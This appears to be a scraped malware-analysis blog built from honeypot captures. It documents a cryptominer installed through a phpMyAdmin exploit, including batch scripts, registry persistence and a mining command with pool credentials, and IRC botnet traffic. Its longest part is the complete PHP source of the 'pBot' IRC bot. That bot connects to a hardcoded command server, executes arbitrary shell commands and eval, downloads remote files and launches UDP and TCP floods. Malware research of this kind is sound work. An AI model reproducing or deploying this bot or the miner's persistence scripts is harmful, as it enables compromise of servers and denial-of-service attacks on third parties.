<< 001 Taze{NhG-XP-USA}595632
<< 002 Taze{NhG-XP-USA}595632
<< 003 Taze{NhG-XP-USA}595632
<< 004 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 422 Taze{NhG-XP-USA}595632 :MOTD File is missing
>> JOIN #!Nh!# NhG
>> PING :HTTP1.4
>> PONG :HTTP1.4
</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<a href="https://www.virustotal.com/en/file/d934e15afd07c847cce412d3a8d96d6657286c6f809a2d4acf8e46b54d580aee/analysis/1422795081/" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"><img alt="test" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjDIqIhUe5O4gSb8xmgunDE92zPt6tT3XSYCpc2OStdN6KX9E83l7jf6jvv-O6mBpLrGpd3r8N1yEWkyOAaZ_LW4bFKk58d4mfHruqsBDXP-ptcGKjHU3nY7u6b2MzNQE0Y_qCD477mW3/s250/vt.PNG" /></a><a href="https://malwr.com/analysis/OGVjZTZjNTRjMTQ0NDQ0YzhmNWIxYjAxNTE4MzY3OWM/share/9c8baa8078c449c6ac62a23ae2349cb5"><img alt="https://malwr.com/analysis/OGVjZTZjNTRjMTQ0NDQ0YzhmNWIxYjAxNTE4MzY3OWM/share/9c8baa8078c449c6ac62a23ae2349cb5" border="0" height="30" src="https://malwr.com/static/graphic/malwr.png" width="100" /></a>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-73997429583145364342015-01-31T12:31:00.003-08:002015-01-31T12:31:26.035-08:00Miner Spreading over Zmeu Infected machine cpu at 100% , bin execution dir was C:\appserv\phpmyadmin\ , following the logs it got infected throu that pma exploit <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAuJPaLYyDSv4RNfD0eOxBsdAb2MMRMHBVw4Vfl4f7BMLAXI276tg3XK3LXjjktWMM9uU2h4tYO-hpVz6N3CrfI8NeCn0Nu_6LeNtxCDwg07a_pqXXTvj96toqLyAt4TzCjOFhgmzT8Mc/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAuJPaLYyDSv4RNfD0eOxBsdAb2MMRMHBVw4Vfl4f7BMLAXI276tg3XK3LXjjktWMM9uU2h4tYO-hpVz6N3CrfI8NeCn0Nu_6LeNtxCDwg07a_pqXXTvj96toqLyAt4TzCjOFhgmzT8Mc/s320/1.png" /></a><br />
init.exe - SFX archive that calls another SFX arch called sys,exe<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicXgJ5MVRPC-iigG23_2v5LdwSZ6w_3hlUhzJ3Q9QLE0_0Xk3bTLyrXf785Fj6kpMXlMKgGaSUXZBxMq8w4a_oSTdJdtYuWPw6dOrX8Th_B-LS2Ki9r8LhD0q7JpaoioGS90lrR2JvafU/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicXgJ5MVRPC-iigG23_2v5LdwSZ6w_3hlUhzJ3Q9QLE0_0Xk3bTLyrXf785Fj6kpMXlMKgGaSUXZBxMq8w4a_oSTdJdtYuWPw6dOrX8Th_B-LS2Ki9r8LhD0q7JpaoioGS90lrR2JvafU/s320/2.png" /></a><br />
sys.exe<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEHQaKAKWxQCGfZmNXv8wJQ5oJDyU2qiRc98Wq5b-0-yt5OHnl7_9IMjiB3qLY89BZUsstI65-vo9fcilFxUcSSdQsQJtS-EhUEUjKZ1-xrIWbnbjiwgmARGaoXFIodTEW6Jr7cTfJBE/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEHQaKAKWxQCGfZmNXv8wJQ5oJDyU2qiRc98Wq5b-0-yt5OHnl7_9IMjiB3qLY89BZUsstI65-vo9fcilFxUcSSdQsQJtS-EhUEUjKZ1-xrIWbnbjiwgmARGaoXFIodTEW6Jr7cTfJBE/s320/3.png" /></a><br />
run.bat<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">@ECHO OFF
START /WAIT /B taskkill /F /IM init.exe > nul
ping -n 3 -w 2 127.0.0.1 > nul
call geox.exe -pula
:end
</code></pre>
geox..exe<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtOMErUB_B_F_uw2NpXW-x_BrHAgz1WguJI_72CH14f7qcCWdKKt9WTOWL4a3Q2XNLg8OHJnp8ZOclx05gMM6Ake4dmalORaVMdMWPLrBhaFg7gWeHCNcvjZH7yUVhU61fmR3IOWumvlk/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtOMErUB_B_F_uw2NpXW-x_BrHAgz1WguJI_72CH14f7qcCWdKKt9WTOWL4a3Q2XNLg8OHJnp8ZOclx05gMM6Ake4dmalORaVMdMWPLrBhaFg7gWeHCNcvjZH7yUVhU61fmR3IOWumvlk/s320/4.png" /></a><br />
run.bat - sets mode hiden on folder's<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">@ECHO OFF
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_USE_SYNC_OBJECTS 1
START /WAIT /B regedit /s %SystemRoot%\init\spoolv32\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv32\bash
START /WAIT /B regedit /s %SystemRoot%\init\spoolv64\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv64\bash
START attrib +H +S %SystemRoot%\init
</code></pre>
reg.reg / sets itself at startup services<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho8VZJ25MlkVRcA8mVU3zZfZ9HhgyvO4U0AK3L6lmO1dfResseVR6cFKYmOAWLRCyediZdFR9KFwBZekZ5b5HKdOhHTTUc3KdzpK_dK3RmMDhkaTuFnSHqQ23OpIecSuooVLCORjydc6w/s1600/6.png" imageanchor="1"> <img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho8VZJ25MlkVRcA8mVU3zZfZ9HhgyvO4U0AK3L6lmO1dfResseVR6cFKYmOAWLRCyediZdFR9KFwBZekZ5b5HKdOhHTTUc3KdzpK_dK3RmMDhkaTuFnSHqQ23OpIecSuooVLCORjydc6w/s320/6.png" /></a><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
</code></pre>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsi5RRTYsMPncJSoJcVj2AViDPSSzKq_7R7CV2lmU1Ev1mo8yGNny97KSsoaYv0vkWdUeNK0FMAVM0X8Lo1gVwvRL4OAhI8uyhC7qQvkpRPBzScCH15KyhWpZx2xLBJBibArz_FpnpLCs/s1600/7.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsi5RRTYsMPncJSoJcVj2AViDPSSzKq_7R7CV2lmU1Ev1mo8yGNny97KSsoaYv0vkWdUeNK0FMAVM0X8Lo1gVwvRL4OAhI8uyhC7qQvkpRPBzScCH15KyhWpZx2xLBJBibArz_FpnpLCs/s320/7.png" /></a><br />
bash.lnk - also stars miner whith following command , host , user and pass<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">%SystemRoot%\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv32" /HIGH "%SystemRoot%\init\spoolv32\init.exe -o stratum+tcp://stratum.wemineftc.com:80 -O geox.1:x"
</code></pre>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTHG_C2TmbzHYZkz0yYpU_N-tXJ3Jutl35Tw3P09QiqWqUWBQcdX2jtfGeuR1YG-DF24OqmhIPbpjvBawz0dCNVInh9aZiUmjzyRJFi4ln6USHNG8NUHinJU-X2SwkTh4aubmduxZXVc/s1600/8.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTHG_C2TmbzHYZkz0yYpU_N-tXJ3Jutl35Tw3P09QiqWqUWBQcdX2jtfGeuR1YG-DF24OqmhIPbpjvBawz0dCNVInh9aZiUmjzyRJFi4ln6USHNG8NUHinJU-X2SwkTh4aubmduxZXVc/s320/8.png" /></a> <br />
init.exe - miner exe also a help command on it .<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyS2MyuZkfM5NCG4c-1hYhWZsGF6bmVzkeU0wxGrGBDCJIpGKnmhl65xwp79Xtaot1H2Dy_HbeUtbcwKUzhNX74AWOSUBLCMv64x0X68_k9M35nCAX9TQyq394x0QpHbSMEujj0ah1aEs/s1600/9.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyS2MyuZkfM5NCG4c-1hYhWZsGF6bmVzkeU0wxGrGBDCJIpGKnmhl65xwp79Xtaot1H2Dy_HbeUtbcwKUzhNX74AWOSUBLCMv64x0X68_k9M35nCAX9TQyq394x0QpHbSMEujj0ah1aEs/s320/9.png" /></a><br />
<br />
<span style="background-color: #cccccc;"><span style="color: #3d85c6;"><b><a href="https://www.virustotal.com/en/file/a446373de81e554d9077b063e78acf4091396e38cbe055868c6ecae3e116a020/analysis/" target="_blank">VirusTotal</a></b></span></span> - <span style="background-color: #cccccc;"><b><a href="https://malwr.com/analysis/MWZiM2E2MjNmNGFmNGY1MzgyMmNhNGMwOWM3MWVjZWQ/share/f966eed9aca74adeba1cf7ca1b0eca0f" target="_blank">Malwr</a></b></span>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-65344296318573011212015-01-28T14:09:00.002-08:002015-01-28T14:11:35.112-08:00pBot - 167.114.128.120 - IRC<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXB8lDTsLIquQ7sgGtfFXnOzN50qGh7ifXN4GyVS6ZoIacKohQHMxaPTErDI-JwhA0vyhjhedD01Wre0aE00fLre42r6J5yL5sl-grpzzmpe2O4TSQnCVDzXuWmltvt04P7Dx0Bf_MYM/s1600/1.png" imageanchor="1"><img alt="Honeypot Logs" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXB8lDTsLIquQ7sgGtfFXnOzN50qGh7ifXN4GyVS6ZoIacKohQHMxaPTErDI-JwhA0vyhjhedD01Wre0aE00fLre42r6J5yL5sl-grpzzmpe2O4TSQnCVDzXuWmltvt04P7Dx0Bf_MYM/s320/1.png" title="Honeypot Logs" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYh8xY-XLQ5ODWNnJkED0dO-b4IDhbwIA0SqLvW3GhN0sBTNqYjygJkaGSqOsKrFZh-sA46WW7x6DHSMgdvhuapRcyssoUGsmB-K7XQBVz7FVBASnfcEA0Y6ofvtVbzMI6JVSMKzri7Wk/s1600/2.png" imageanchor="1"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYh8xY-XLQ5ODWNnJkED0dO-b4IDhbwIA0SqLvW3GhN0sBTNqYjygJkaGSqOsKrFZh-sA46WW7x6DHSMgdvhuapRcyssoUGsmB-K7XQBVz7FVBASnfcEA0Y6ofvtVbzMI6JVSMKzri7Wk/s320/2.png" title="Nmap Scan " /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX26FbdlYvknA8bDe6Mu15OAkydPD7eI3sG6sECMLJYh6E1sJsOHjowKsHhC1WuoVhwUM1PvY8yDQE50zQcloP35vUKPBU7kHJ_SfWCyF5jtrySGTRVrvZN9-Ij6ruV9yZN-TpeQU63kY/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX26FbdlYvknA8bDe6Mu15OAkydPD7eI3sG6sECMLJYh6E1sJsOHjowKsHhC1WuoVhwUM1PvY8yDQE50zQcloP35vUKPBU7kHJ_SfWCyF5jtrySGTRVrvZN9-Ij6ruV9yZN-TpeQU63kY/s320/3.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqPjmpKCuE9bkvnhy1GYUZ3_1Z-V35D2DNe8mlco3KWZ8BAPSFQL7YG-ektpU7S-DGox2NwtaKC8laAMY4JRbNluSwZ4nlaI033MdqBevYQwhwA8j0alEDOa6cdZTGEP9XdNDMcijxxQA/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqPjmpKCuE9bkvnhy1GYUZ3_1Z-V35D2DNe8mlco3KWZ8BAPSFQL7YG-ektpU7S-DGox2NwtaKC8laAMY4JRbNluSwZ4nlaI033MdqBevYQwhwA8j0alEDOa6cdZTGEP9XdNDMcijxxQA/s320/4.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RKKNA1kGhcpDJs435be_XqZpJulPLaek9MNpDX5LXv7izRB8si9mvp4n1NYf5fspcrrG-tD7bnRyGJ2JkMXw6sZlA148kEd3XUwiwmM53M7Vni4cQbCrk6JH7hWgOBXDUSkdUpHRdZA/s1600/5.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RKKNA1kGhcpDJs435be_XqZpJulPLaek9MNpDX5LXv7izRB8si9mvp4n1NYf5fspcrrG-tD7bnRyGJ2JkMXw6sZlA148kEd3XUwiwmM53M7Vni4cQbCrk6JH7hWgOBXDUSkdUpHRdZA/s320/5.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqmTeh1fp7ZezTSe-_IUQ2f1dhC8DOGgOTbULw_sH7hPwuQeb9dwN4_SNiGyK-gvdU6pfNrsqeZinANS7lz22kLcdFDZaeYyF30-QGtO87hLGUmXUtIYOvyqSXyL_aIfqkNsUKU05Ulas/s1600/6.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqmTeh1fp7ZezTSe-_IUQ2f1dhC8DOGgOTbULw_sH7hPwuQeb9dwN4_SNiGyK-gvdU6pfNrsqeZinANS7lz22kLcdFDZaeYyF30-QGtO87hLGUmXUtIYOvyqSXyL_aIfqkNsUKU05Ulas/s320/6.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfplg20rmEGXlbsBj-l9qJ_muBAfcZEjOnwIR19vaM5Rq4HxVqp341QRobsllWtaHsQ2WqDqsHgiUQ6s0XsJD81VB2pGgrPIz7jVUV787msbw7SwjKuzUMnRI8Nr8ZrYy9Rl2xYwtSGhQ/s1600/7.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfplg20rmEGXlbsBj-l9qJ_muBAfcZEjOnwIR19vaM5Rq4HxVqp341QRobsllWtaHsQ2WqDqsHgiUQ6s0XsJD81VB2pGgrPIz7jVUV787msbw7SwjKuzUMnRI8Nr8ZrYy9Rl2xYwtSGhQ/s320/7.png" /></a><br />
LOL<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_c5ndhjonyVuAuJYxZIVZFjn3_xeWotKXSxxwvi9B0Mz4YtLEYR4Zs-4oKL9bc2QyjCW2e20BKzJntZervQcUOyhOnJJLJMNK6xFex6xXYqk_K4zqNphe2oei9vAbdI4PC5pBODMlqfo/s1600/8.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_c5ndhjonyVuAuJYxZIVZFjn3_xeWotKXSxxwvi9B0Mz4YtLEYR4Zs-4oKL9bc2QyjCW2e20BKzJntZervQcUOyhOnJJLJMNK6xFex6xXYqk_K4zqNphe2oei9vAbdI4PC5pBODMlqfo/s320/8.png" /></a><br />
<br />
He uses zmeu scanner and pma exploit to spread a php botnet !<br />
here is bot script<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"><?php
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class pBot
{
var $config = array("server"=>"167.114.128.120", "port"=>"6668","key"=>"","prefix"=>"", "maxrand"=>"5", "chan"=>"#Boxes","trigger"=>".","hostauth"=>"god.net");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,9)];
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") { $this->join($this->config['chan'],$this->config['key']); continue; }
if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case " ":
if(true)
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case " ":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case " ":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case " ":
$this->set_nick();
break;
case " ":
$this->send(strstr($msg,$mcmd[1]));
break;
case " ":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case " ":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = Exe($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case " ":
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: info updated ".$mcmd[1].":".$mcmd[2]." pass: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: switched server to ".$mcmd[1].":".$mcmd[2]);
}
fclose($this->conn);
}
break;
case " ":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: could not open output file.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: could not download \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: file \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>5) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
}
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$this->nick = "";
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->nick .= "Linux|";
else $this->nick .= "Linux|";
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"nginx")) $this->nick .= "";
else $this->nick .= "";
}
else
{
$this->nick .= "";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"".$env."".$vel."");
}
function tcpconn($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2TcpConn Started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start();
?>
</code></pre>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-58303408084340591202015-01-27T11:59:00.000-08:002015-01-27T11:59:08.902-08:00ragebot - 61.236.93.74 - IRC<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">Server : 61.236.93.74
// hxxp://whois.domaintools.com/61.236.93.74
Port : 6667/tcp open irc Unreal ircd
Channels : </code><code style="color: black; word-wrap: normal;"><code style="color: black; word-wrap: normal;">#g0tme# , #pwned#</code>
// traffic on that </code><code style="color: black; word-wrap: normal;">
<< MODE raGe|iuxwTmMNJS :+iwG
>> JOIN #g0tme#
<< JOIN :#g0tme#
<< 332 raGe|iuxwTmMNJS #g0tme# :!xpl 94 1 222.x.x.x 3 1 222.x.x.x 3 1
<< 333 raGe|iuxwTmMNJS #g0tme# root 1422314449
>> PRIVMSG #g0tme# :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 222.x.x.x with 94 threads. (autorooting)
<< 404 raGe|iuxwTmMNJS #g0tme# :You must have a registered nick (+r) to talk on this channel (#g0tme#)
// run's under the process name </code><code style="color: black; word-wrap: normal;">system32dll.exe
